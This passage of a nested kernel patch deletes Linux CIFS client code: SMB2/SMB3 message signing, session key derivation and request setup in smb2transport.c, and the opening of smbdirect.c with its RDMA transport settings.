+-	 * Otherwise, use the channel key.
+-	 */
+-
+-	for (i = 0; i < ses->chan_count; i++) {
+-		chan = ses->chans + i;
+-		if (chan->server == server) {
+-			memcpy(key, chan->signkey, SMB3_SIGN_KEY_SIZE);
+-			spin_unlock(&ses->chan_lock);
+-			spin_unlock(&ses->ses_lock);
+-			goto out;
+-		}
+-	}
+-	spin_unlock(&ses->chan_lock);
+-	spin_unlock(&ses->ses_lock);
+-
+-	cifs_dbg(VFS,
+-		 "%s: Could not find channel signing key for session 0x%llx\n",
+-		 __func__, ses_id);
+-	rc = -ENOENT;
+-
+-out:
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	return rc;
+-}
+-
+-static struct cifs_ses *
+-smb2_find_smb_ses_unlocked(struct TCP_Server_Info *server, __u64 ses_id)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		if (ses->Suid != ses_id)
+-			continue;
+-		++ses->ses_count;
+-		return ses;
+-	}
+-
+-	return NULL;
+-}
+-
+-struct cifs_ses *
+-smb2_find_smb_ses(struct TCP_Server_Info *server, __u64 ses_id)
+-{
+-	struct cifs_ses *ses;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	ses = smb2_find_smb_ses_unlocked(server, ses_id);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	return ses;
+-}
+-
+-static struct cifs_tcon *
+-smb2_find_smb_sess_tcon_unlocked(struct cifs_ses *ses, __u32  tid)
+-{
+-	struct cifs_tcon *tcon;
+-
+-	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-		if (tcon->tid != tid)
+-			continue;
+-		++tcon->tc_count;
+-		return tcon;
+-	}
+-
+-	return NULL;
+-}
+-
+-/*
+- * Obtain tcon corresponding to the tid in the given
+- * cifs_ses
+- */
+-
+-struct cifs_tcon *
+-smb2_find_smb_tcon(struct TCP_Server_Info *server, __u64 ses_id, __u32  tid)
+-{
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	ses = smb2_find_smb_ses_unlocked(server, ses_id);
+-	if (!ses) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return NULL;
+-	}
+-	tcon = smb2_find_smb_sess_tcon_unlocked(ses, tid);
+-	if (!tcon) {
+-		cifs_put_smb_ses(ses);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return NULL;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	/* tcon already has a ref to ses, so we don't need ses anymore */
+-	cifs_put_smb_ses(ses);
+-
+-	return tcon;
+-}
+-
+-int
+-smb2_calc_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server,
+-			bool allocate_crypto)
+-{
+-	int rc;
+-	unsigned char smb2_signature[SMB2_HMACSHA256_SIZE];
+-	unsigned char *sigptr = smb2_signature;
+-	struct kvec *iov = rqst->rq_iov;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)iov[0].iov_base;
+-	struct cifs_ses *ses;
+-	struct shash_desc *shash = NULL;
+-	struct smb_rqst drqst;
+-
+-	ses = smb2_find_smb_ses(server, le64_to_cpu(shdr->SessionId));
+-	if (unlikely(!ses)) {
+-		cifs_server_dbg(VFS, "%s: Could not find session\n", __func__);
+-		return -ENOENT;
+-	}
+-
+-	memset(smb2_signature, 0x0, SMB2_HMACSHA256_SIZE);
+-	memset(shdr->Signature, 0x0, SMB2_SIGNATURE_SIZE);
+-
+-	if (allocate_crypto) {
+-		rc = cifs_alloc_hash("hmac(sha256)", &shash);
+-		if (rc) {
+-			cifs_server_dbg(VFS,
+-					"%s: sha256 alloc failed\n", __func__);
+-			goto out;
+-		}
+-	} else {
+-		shash = server->secmech.hmacsha256;
+-	}
+-
+-	rc = crypto_shash_setkey(shash->tfm, ses->auth_key.response,
+-			SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc) {
+-		cifs_server_dbg(VFS,
+-				"%s: Could not update with response\n",
+-				__func__);
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_init(shash);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not init sha256", __func__);
+-		goto out;
+-	}
+-
+-	/*
+-	 * For SMB2+, __cifs_calc_signature() expects to sign only the actual
+-	 * data, that is, iov[0] should not contain a rfc1002 length.
+-	 *
+-	 * Sign the rfc1002 length prior to passing the data (iov[1-N]) down to
+-	 * __cifs_calc_signature().
+-	 */
+-	drqst = *rqst;
+-	if (drqst.rq_nvec >= 2 && iov[0].iov_len == 4) {
+-		rc = crypto_shash_update(shash, iov[0].iov_base,
+-					 iov[0].iov_len);
+-		if (rc) {
+-			cifs_server_dbg(VFS,
+-					"%s: Could not update with payload\n",
+-					__func__);
+-			goto out;
+-		}
+-		drqst.rq_iov++;
+-		drqst.rq_nvec--;
+-	}
+-
+-	rc = __cifs_calc_signature(&drqst, server, sigptr, shash);
+-	if (!rc)
+-		memcpy(shdr->Signature, sigptr, SMB2_SIGNATURE_SIZE);
+-
+-out:
+-	if (allocate_crypto)
+-		cifs_free_hash(&shash);
+-	if (ses)
+-		cifs_put_smb_ses(ses);
+-	return rc;
+-}
+-
+-static int generate_key(struct cifs_ses *ses, struct kvec label,
+-			struct kvec context, __u8 *key, unsigned int key_size)
+-{
+-	unsigned char zero = 0x0;
+-	__u8 i[4] = {0, 0, 0, 1};
+-	__u8 L128[4] = {0, 0, 0, 128};
+-	__u8 L256[4] = {0, 0, 1, 0};
+-	int rc = 0;
+-	unsigned char prfhash[SMB2_HMACSHA256_SIZE];
+-	unsigned char *hashptr = prfhash;
+-	struct TCP_Server_Info *server = ses->server;
+-
+-	memset(prfhash, 0x0, SMB2_HMACSHA256_SIZE);
+-	memset(key, 0x0, key_size);
+-
+-	rc = smb3_crypto_shash_allocate(server);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: crypto alloc failed\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_setkey(server->secmech.hmacsha256->tfm,
+-		ses->auth_key.response, SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not set with session key\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_init(server->secmech.hmacsha256);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not init sign hmac\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.hmacsha256, i, 4);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with n\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.hmacsha256, label.iov_base, label.iov_len);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with label\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.hmacsha256, &zero, 1);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with zero\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(server->secmech.hmacsha256, context.iov_base, context.iov_len);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with context\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
+-		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM)) {
+-		rc = crypto_shash_update(server->secmech.hmacsha256, L256, 4);
+-	} else {
+-		rc = crypto_shash_update(server->secmech.hmacsha256, L128, 4);
+-	}
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not update with L\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_final(server->secmech.hmacsha256, hashptr);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not generate sha256 hash\n", __func__);
+-		goto smb3signkey_ret;
+-	}
+-
+-	memcpy(key, hashptr, key_size);
+-
+-smb3signkey_ret:
+-	return rc;
+-}
+-
+-struct derivation {
+-	struct kvec label;
+-	struct kvec context;
+-};
+-
+-struct derivation_triplet {
+-	struct derivation signing;
+-	struct derivation encryption;
+-	struct derivation decryption;
+-};
+-
+-static int
+-generate_smb3signingkey(struct cifs_ses *ses,
+-			struct TCP_Server_Info *server,
+-			const struct derivation_triplet *ptriplet)
+-{
+-	int rc;
+-	bool is_binding = false;
+-	int chan_index = 0;
+-
+-	spin_lock(&ses->ses_lock);
+-	spin_lock(&ses->chan_lock);
+-	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
+-		      ses->ses_status == SES_GOOD);
+-
+-	chan_index = cifs_ses_get_chan_index(ses, server);
+-	/* TODO: introduce ref counting for channels when the can be freed */
+-	spin_unlock(&ses->chan_lock);
+-	spin_unlock(&ses->ses_lock);
+-
+-	/*
+-	 * All channels use the same encryption/decryption keys but
+-	 * they have their own signing key.
+-	 *
+-	 * When we generate the keys, check if it is for a new channel
+-	 * (binding) in which case we only need to generate a signing
+-	 * key and store it in the channel as to not overwrite the
+-	 * master connection signing key stored in the session
+-	 */
+-
+-	if (is_binding) {
+-		rc = generate_key(ses, ptriplet->signing.label,
+-				  ptriplet->signing.context,
+-				  ses->chans[chan_index].signkey,
+-				  SMB3_SIGN_KEY_SIZE);
+-		if (rc)
+-			return rc;
+-	} else {
+-		rc = generate_key(ses, ptriplet->signing.label,
+-				  ptriplet->signing.context,
+-				  ses->smb3signingkey,
+-				  SMB3_SIGN_KEY_SIZE);
+-		if (rc)
+-			return rc;
+-
+-		/* safe to access primary channel, since it will never go away */
+-		spin_lock(&ses->chan_lock);
+-		memcpy(ses->chans[chan_index].signkey, ses->smb3signingkey,
+-		       SMB3_SIGN_KEY_SIZE);
+-		spin_unlock(&ses->chan_lock);
+-
+-		rc = generate_key(ses, ptriplet->encryption.label,
+-				  ptriplet->encryption.context,
+-				  ses->smb3encryptionkey,
+-				  SMB3_ENC_DEC_KEY_SIZE);
+-		rc = generate_key(ses, ptriplet->decryption.label,
+-				  ptriplet->decryption.context,
+-				  ses->smb3decryptionkey,
+-				  SMB3_ENC_DEC_KEY_SIZE);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	if (rc)
+-		return rc;
+-
+-#ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
+-	cifs_dbg(VFS, "%s: dumping generated AES session keys\n", __func__);
+-	/*
+-	 * The session id is opaque in terms of endianness, so we can't
+-	 * print it as a long long. we dump it as we got it on the wire
+-	 */
+-	cifs_dbg(VFS, "Session Id    %*ph\n", (int)sizeof(ses->Suid),
+-			&ses->Suid);
+-	cifs_dbg(VFS, "Cipher type   %d\n", server->cipher_type);
+-	cifs_dbg(VFS, "Session Key   %*ph\n",
+-		 SMB2_NTLMV2_SESSKEY_SIZE, ses->auth_key.response);
+-	cifs_dbg(VFS, "Signing Key   %*ph\n",
+-		 SMB3_SIGN_KEY_SIZE, ses->smb3signingkey);
+-	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
+-		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM)) {
+-		cifs_dbg(VFS, "ServerIn Key  %*ph\n",
+-				SMB3_GCM256_CRYPTKEY_SIZE, ses->smb3encryptionkey);
+-		cifs_dbg(VFS, "ServerOut Key %*ph\n",
+-				SMB3_GCM256_CRYPTKEY_SIZE, ses->smb3decryptionkey);
+-	} else {
+-		cifs_dbg(VFS, "ServerIn Key  %*ph\n",
+-				SMB3_GCM128_CRYPTKEY_SIZE, ses->smb3encryptionkey);
+-		cifs_dbg(VFS, "ServerOut Key %*ph\n",
+-				SMB3_GCM128_CRYPTKEY_SIZE, ses->smb3decryptionkey);
+-	}
+-#endif
+-	return rc;
+-}
+-
+-int
+-generate_smb30signingkey(struct cifs_ses *ses,
+-			 struct TCP_Server_Info *server)
+-
+-{
+-	struct derivation_triplet triplet;
+-	struct derivation *d;
+-
+-	d = &triplet.signing;
+-	d->label.iov_base = "SMB2AESCMAC";
+-	d->label.iov_len = 12;
+-	d->context.iov_base = "SmbSign";
+-	d->context.iov_len = 8;
+-
+-	d = &triplet.encryption;
+-	d->label.iov_base = "SMB2AESCCM";
+-	d->label.iov_len = 11;
+-	d->context.iov_base = "ServerIn ";
+-	d->context.iov_len = 10;
+-
+-	d = &triplet.decryption;
+-	d->label.iov_base = "SMB2AESCCM";
+-	d->label.iov_len = 11;
+-	d->context.iov_base = "ServerOut";
+-	d->context.iov_len = 10;
+-
+-	return generate_smb3signingkey(ses, server, &triplet);
+-}
+-
+-int
+-generate_smb311signingkey(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server)
+-
+-{
+-	struct derivation_triplet triplet;
+-	struct derivation *d;
+-
+-	d = &triplet.signing;
+-	d->label.iov_base = "SMBSigningKey";
+-	d->label.iov_len = 14;
+-	d->context.iov_base = ses->preauth_sha_hash;
+-	d->context.iov_len = 64;
+-
+-	d = &triplet.encryption;
+-	d->label.iov_base = "SMBC2SCipherKey";
+-	d->label.iov_len = 16;
+-	d->context.iov_base = ses->preauth_sha_hash;
+-	d->context.iov_len = 64;
+-
+-	d = &triplet.decryption;
+-	d->label.iov_base = "SMBS2CCipherKey";
+-	d->label.iov_len = 16;
+-	d->context.iov_base = ses->preauth_sha_hash;
+-	d->context.iov_len = 64;
+-
+-	return generate_smb3signingkey(ses, server, &triplet);
+-}
+-
+-int
+-smb3_calc_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server,
+-			bool allocate_crypto)
+-{
+-	int rc;
+-	unsigned char smb3_signature[SMB2_CMACAES_SIZE];
+-	unsigned char *sigptr = smb3_signature;
+-	struct kvec *iov = rqst->rq_iov;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)iov[0].iov_base;
+-	struct shash_desc *shash = NULL;
+-	struct smb_rqst drqst;
+-	u8 key[SMB3_SIGN_KEY_SIZE];
+-
+-	rc = smb2_get_sign_key(le64_to_cpu(shdr->SessionId), server, key);
+-	if (unlikely(rc)) {
+-		cifs_server_dbg(VFS, "%s: Could not get signing key\n", __func__);
+-		return rc;
+-	}
+-
+-	if (allocate_crypto) {
+-		rc = cifs_alloc_hash("cmac(aes)", &shash);
+-		if (rc)
+-			return rc;
+-	} else {
+-		shash = server->secmech.aes_cmac;
+-	}
+-
+-	memset(smb3_signature, 0x0, SMB2_CMACAES_SIZE);
+-	memset(shdr->Signature, 0x0, SMB2_SIGNATURE_SIZE);
+-
+-	rc = crypto_shash_setkey(shash->tfm, key, SMB2_CMACAES_SIZE);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not set key for cmac aes\n", __func__);
+-		goto out;
+-	}
+-
+-	/*
+-	 * we already allocate aes_cmac when we init smb3 signing key,
+-	 * so unlike smb2 case we do not have to check here if secmech are
+-	 * initialized
+-	 */
+-	rc = crypto_shash_init(shash);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not init cmac aes\n", __func__);
+-		goto out;
+-	}
+-
+-	/*
+-	 * For SMB2+, __cifs_calc_signature() expects to sign only the actual
+-	 * data, that is, iov[0] should not contain a rfc1002 length.
+-	 *
+-	 * Sign the rfc1002 length prior to passing the data (iov[1-N]) down to
+-	 * __cifs_calc_signature().
+-	 */
+-	drqst = *rqst;
+-	if (drqst.rq_nvec >= 2 && iov[0].iov_len == 4) {
+-		rc = crypto_shash_update(shash, iov[0].iov_base,
+-					 iov[0].iov_len);
+-		if (rc) {
+-			cifs_server_dbg(VFS, "%s: Could not update with payload\n",
+-				 __func__);
+-			goto out;
+-		}
+-		drqst.rq_iov++;
+-		drqst.rq_nvec--;
+-	}
+-
+-	rc = __cifs_calc_signature(&drqst, server, sigptr, shash);
+-	if (!rc)
+-		memcpy(shdr->Signature, sigptr, SMB2_SIGNATURE_SIZE);
+-
+-out:
+-	if (allocate_crypto)
+-		cifs_free_hash(&shash);
+-	return rc;
+-}
+-
+-/* must be called with server->srv_mutex held */
+-static int
+-smb2_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	struct smb2_hdr *shdr;
+-	struct smb2_sess_setup_req *ssr;
+-	bool is_binding;
+-	bool is_signed;
+-
+-	shdr = (struct smb2_hdr *)rqst->rq_iov[0].iov_base;
+-	ssr = (struct smb2_sess_setup_req *)shdr;
+-
+-	is_binding = shdr->Command == SMB2_SESSION_SETUP &&
+-		(ssr->Flags & SMB2_SESSION_REQ_FLAG_BINDING);
+-	is_signed = shdr->Flags & SMB2_FLAGS_SIGNED;
+-
+-	if (!is_signed)
+-		return 0;
+-	spin_lock(&server->srv_lock);
+-	if (server->ops->need_neg &&
+-	    server->ops->need_neg(server)) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-	spin_unlock(&server->srv_lock);
+-	if (!is_binding && !server->session_estab) {
+-		strncpy(shdr->Signature, "BSRSPYL", 8);
+-		return 0;
+-	}
+-
+-	rc = server->ops->calc_signature(rqst, server, false);
+-
+-	return rc;
+-}
+-
+-int
+-smb2_verify_signature(struct smb_rqst *rqst, struct TCP_Server_Info *server)
+-{
+-	unsigned int rc;
+-	char server_response_sig[SMB2_SIGNATURE_SIZE];
+-	struct smb2_hdr *shdr =
+-			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
+-
+-	if ((shdr->Command == SMB2_NEGOTIATE) ||
+-	    (shdr->Command == SMB2_SESSION_SETUP) ||
+-	    (shdr->Command == SMB2_OPLOCK_BREAK) ||
+-	    server->ignore_signature ||
+-	    (!server->session_estab))
+-		return 0;
+-
+-	/*
+-	 * BB what if signatures are supposed to be on for session but
+-	 * server does not send one? BB
+-	 */
+-
+-	/* Do not need to verify session setups with signature "BSRSPYL " */
+-	if (memcmp(shdr->Signature, "BSRSPYL ", 8) == 0)
+-		cifs_dbg(FYI, "dummy signature received for smb command 0x%x\n",
+-			 shdr->Command);
+-
+-	/*
+-	 * Save off the origiginal signature so we can modify the smb and check
+-	 * our calculated signature against what the server sent.
+-	 */
+-	memcpy(server_response_sig, shdr->Signature, SMB2_SIGNATURE_SIZE);
+-
+-	memset(shdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-
+-	rc = server->ops->calc_signature(rqst, server, true);
+-
+-	if (rc)
+-		return rc;
+-
+-	if (memcmp(server_response_sig, shdr->Signature, SMB2_SIGNATURE_SIZE)) {
+-		cifs_dbg(VFS, "sign fail cmd 0x%x message id 0x%llx\n",
+-			shdr->Command, shdr->MessageId);
+-		return -EACCES;
+-	} else
+-		return 0;
+-}
+-
+-/*
+- * Set message id for the request. Should be called after wait_for_free_request
+- * and when srv_mutex is held.
+- */
+-static inline void
+-smb2_seq_num_into_buf(struct TCP_Server_Info *server,
+-		      struct smb2_hdr *shdr)
+-{
+-	unsigned int i, num = le16_to_cpu(shdr->CreditCharge);
+-
+-	shdr->MessageId = get_next_mid64(server);
+-	/* skip message numbers according to CreditCharge field */
+-	for (i = 1; i < num; i++)
+-		get_next_mid(server);
+-}
+-
+-static struct mid_q_entry *
+-smb2_mid_entry_alloc(const struct smb2_hdr *shdr,
+-		     struct TCP_Server_Info *server)
+-{
+-	struct mid_q_entry *temp;
+-	unsigned int credits = le16_to_cpu(shdr->CreditCharge);
+-
+-	if (server == NULL) {
+-		cifs_dbg(VFS, "Null TCP session in smb2_mid_entry_alloc\n");
+-		return NULL;
+-	}
+-
+-	temp = mempool_alloc(cifs_mid_poolp, GFP_NOFS);
+-	memset(temp, 0, sizeof(struct mid_q_entry));
+-	kref_init(&temp->refcount);
+-	temp->mid = le64_to_cpu(shdr->MessageId);
+-	temp->credits = credits > 0 ? credits : 1;
+-	temp->pid = current->pid;
+-	temp->command = shdr->Command; /* Always LE */
+-	temp->when_alloc = jiffies;
+-	temp->server = server;
+-
+-	/*
+-	 * The default is for the mid to be synchronous, so the
+-	 * default callback just wakes up the current task.
+-	 */
+-	get_task_struct(current);
+-	temp->creator = current;
+-	temp->callback = cifs_wake_up_task;
+-	temp->callback_data = current;
+-
+-	atomic_inc(&mid_count);
+-	temp->mid_state = MID_REQUEST_ALLOCATED;
+-	trace_smb3_cmd_enter(le32_to_cpu(shdr->Id.SyncId.TreeId),
+-			     le64_to_cpu(shdr->SessionId),
+-			     le16_to_cpu(shdr->Command), temp->mid);
+-	return temp;
+-}
+-
+-static int
+-smb2_get_mid_entry(struct cifs_ses *ses, struct TCP_Server_Info *server,
+-		   struct smb2_hdr *shdr, struct mid_q_entry **mid)
+-{
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsExiting) {
+-		spin_unlock(&server->srv_lock);
+-		return -ENOENT;
+-	}
+-
+-	if (server->tcpStatus == CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		cifs_dbg(FYI, "tcp session dead - return to caller to retry\n");
+-		return -EAGAIN;
+-	}
+-
+-	if (server->tcpStatus == CifsNeedNegotiate &&
+-	   shdr->Command != SMB2_NEGOTIATE) {
+-		spin_unlock(&server->srv_lock);
+-		return -EAGAIN;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	spin_lock(&ses->ses_lock);
+-	if (ses->ses_status == SES_NEW) {
+-		if ((shdr->Command != SMB2_SESSION_SETUP) &&
+-		    (shdr->Command != SMB2_NEGOTIATE)) {
+-			spin_unlock(&ses->ses_lock);
+-			return -EAGAIN;
+-		}
+-		/* else ok - we are setting up session */
+-	}
+-
+-	if (ses->ses_status == SES_EXITING) {
+-		if (shdr->Command != SMB2_LOGOFF) {
+-			spin_unlock(&ses->ses_lock);
+-			return -EAGAIN;
+-		}
+-		/* else ok - we are shutting down the session */
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-	*mid = smb2_mid_entry_alloc(shdr, server);
+-	if (*mid == NULL)
+-		return -ENOMEM;
+-	spin_lock(&server->mid_lock);
+-	list_add_tail(&(*mid)->qhead, &server->pending_mid_q);
+-	spin_unlock(&server->mid_lock);
+-
+-	return 0;
+-}
+-
+-int
+-smb2_check_receive(struct mid_q_entry *mid, struct TCP_Server_Info *server,
+-		   bool log_error)
+-{
+-	unsigned int len = mid->resp_buf_size;
+-	struct kvec iov[1];
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = 1 };
+-
+-	iov[0].iov_base = (char *)mid->resp_buf;
+-	iov[0].iov_len = len;
+-
+-	dump_smb(mid->resp_buf, min_t(u32, 80, len));
+-	/* convert the length into a more usable form */
+-	if (len > 24 && server->sign && !mid->decrypted) {
+-		int rc;
+-
+-		rc = smb2_verify_signature(&rqst, server);
+-		if (rc)
+-			cifs_server_dbg(VFS, "SMB signature verification returned error = %d\n",
+-				 rc);
+-	}
+-
+-	return map_smb2_to_linux_error(mid->resp_buf, log_error);
+-}
+-
+-struct mid_q_entry *
+-smb2_setup_request(struct cifs_ses *ses, struct TCP_Server_Info *server,
+-		   struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct smb2_hdr *shdr =
+-			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
+-	struct mid_q_entry *mid;
+-
+-	smb2_seq_num_into_buf(server, shdr);
+-
+-	rc = smb2_get_mid_entry(ses, server, shdr, &mid);
+-	if (rc) {
+-		revert_current_mid_from_hdr(server, shdr);
+-		return ERR_PTR(rc);
+-	}
+-
+-	rc = smb2_sign_rqst(rqst, server);
+-	if (rc) {
+-		revert_current_mid_from_hdr(server, shdr);
+-		delete_mid(mid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	return mid;
+-}
+-
+-struct mid_q_entry *
+-smb2_setup_async_request(struct TCP_Server_Info *server, struct smb_rqst *rqst)
+-{
+-	int rc;
+-	struct smb2_hdr *shdr =
+-			(struct smb2_hdr *)rqst->rq_iov[0].iov_base;
+-	struct mid_q_entry *mid;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedNegotiate &&
+-	   shdr->Command != SMB2_NEGOTIATE) {
+-		spin_unlock(&server->srv_lock);
+-		return ERR_PTR(-EAGAIN);
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	smb2_seq_num_into_buf(server, shdr);
+-
+-	mid = smb2_mid_entry_alloc(shdr, server);
+-	if (mid == NULL) {
+-		revert_current_mid_from_hdr(server, shdr);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	rc = smb2_sign_rqst(rqst, server);
+-	if (rc) {
+-		revert_current_mid_from_hdr(server, shdr);
+-		release_mid(mid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	return mid;
+-}
+-
+-int
+-smb3_crypto_aead_allocate(struct TCP_Server_Info *server)
+-{
+-	struct crypto_aead *tfm;
+-
+-	if (!server->secmech.enc) {
+-		if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+-		    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-			tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
+-		else
+-			tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
+-		if (IS_ERR(tfm)) {
+-			cifs_server_dbg(VFS, "%s: Failed alloc encrypt aead\n",
+-				 __func__);
+-			return PTR_ERR(tfm);
+-		}
+-		server->secmech.enc = tfm;
+-	}
+-
+-	if (!server->secmech.dec) {
+-		if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+-		    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-			tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
+-		else
+-			tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
+-		if (IS_ERR(tfm)) {
+-			crypto_free_aead(server->secmech.enc);
+-			server->secmech.enc = NULL;
+-			cifs_server_dbg(VFS, "%s: Failed to alloc decrypt aead\n",
+-				 __func__);
+-			return PTR_ERR(tfm);
+-		}
+-		server->secmech.dec = tfm;
+-	}
+-
+-	return 0;
+-}
+diff --git a/fs/cifs/smbdirect.c b/fs/cifs/smbdirect.c
+deleted file mode 100644
+index cf923f211c512..0000000000000
+--- a/fs/cifs/smbdirect.c
++++ /dev/null
+@@ -1,2494 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2017, Microsoft Corporation.
+- *
+- *   Author(s): Long Li <longli@microsoft.com>
+- */
+-#include <linux/module.h>
+-#include <linux/highmem.h>
+-#include "smbdirect.h"
+-#include "cifs_debug.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-
+-static struct smbd_response *get_empty_queue_buffer(
+-		struct smbd_connection *info);
+-static struct smbd_response *get_receive_buffer(
+-		struct smbd_connection *info);
+-static void put_receive_buffer(
+-		struct smbd_connection *info,
+-		struct smbd_response *response);
+-static int allocate_receive_buffers(struct smbd_connection *info, int num_buf);
+-static void destroy_receive_buffers(struct smbd_connection *info);
+-
+-static void put_empty_packet(
+-		struct smbd_connection *info, struct smbd_response *response);
+-static void enqueue_reassembly(
+-		struct smbd_connection *info,
+-		struct smbd_response *response, int data_length);
+-static struct smbd_response *_get_first_reassembly(
+-		struct smbd_connection *info);
+-
+-static int smbd_post_recv(
+-		struct smbd_connection *info,
+-		struct smbd_response *response);
+-
+-static int smbd_post_send_empty(struct smbd_connection *info);
+-static int smbd_post_send_data(
+-		struct smbd_connection *info,
+-		struct kvec *iov, int n_vec, int remaining_data_length);
+-static int smbd_post_send_page(struct smbd_connection *info,
+-		struct page *page, unsigned long offset,
+-		size_t size, int remaining_data_length);
+-
+-static void destroy_mr_list(struct smbd_connection *info);
+-static int allocate_mr_list(struct smbd_connection *info);
+-
+-/* SMBD version number */
+-#define SMBD_V1	0x0100
+-
+-/* Port numbers for SMBD transport */
+-#define SMB_PORT	445
+-#define SMBD_PORT	5445
+-
+-/* Address lookup and resolve timeout in ms */
+-#define RDMA_RESOLVE_TIMEOUT	5000
+-
+-/* SMBD negotiation timeout in seconds */
+-#define SMBD_NEGOTIATE_TIMEOUT	120
+-
+-/* SMBD minimum receive size and fragmented sized defined in [MS-SMBD] */
+-#define SMBD_MIN_RECEIVE_SIZE		128
+-#define SMBD_MIN_FRAGMENTED_SIZE	131072
+-
+-/*
+- * Default maximum number of RDMA read/write outstanding on this connection
+- * This value is possibly decreased during QP creation on hardware limit
+- */
+-#define SMBD_CM_RESPONDER_RESOURCES	32
+-
+-/* Maximum number of retries on data transfer operations */
+-#define SMBD_CM_RETRY			6
+-/* No need to retry on Receiver Not Ready since SMBD manages credits */
+-#define SMBD_CM_RNR_RETRY		0
+-
+-/*
+- * User configurable initial values per SMBD transport connection
+- * as defined in [MS-SMBD] 3.1.1.1
+- * Those may change after a SMBD negotiation
+- */
+-/* The local peer's maximum number of credits to grant to the peer */
+-int smbd_receive_credit_max = 255;
+-
+-/* The remote peer's credit request of local peer */
+-int smbd_send_credit_target = 255;
+-
+-/* The maximum single message size can be sent to remote peer */
+-int smbd_max_send_size = 1364;
+-
+-/*  The maximum fragmented upper-layer payload receive size supported */
+-int smbd_max_fragmented_recv_size = 1024 * 1024;
+-
+-/*  The maximum single-message size which can be received */
+-int smbd_max_receive_size = 1364;
+-
+-/* The timeout to initiate send of a keepalive message on idle */
+-int smbd_keep_alive_interval = 120;
+-
+-/*
+- * User configurable initial values for RDMA transport
+- * The actual values used may be lower and are limited to hardware capabilities
+- */
+-/* Default maximum number of pages in a single RDMA write/read */
+-int smbd_max_frmr_depth = 2048;
+-
+-/* If payload is less than this byte, use RDMA send/recv not read/write */
+-int rdma_readwrite_threshold = 4096;
+-
+-/* Transport logging functions
+- * Logging are defined as classes. They can be OR'ed to define the actual
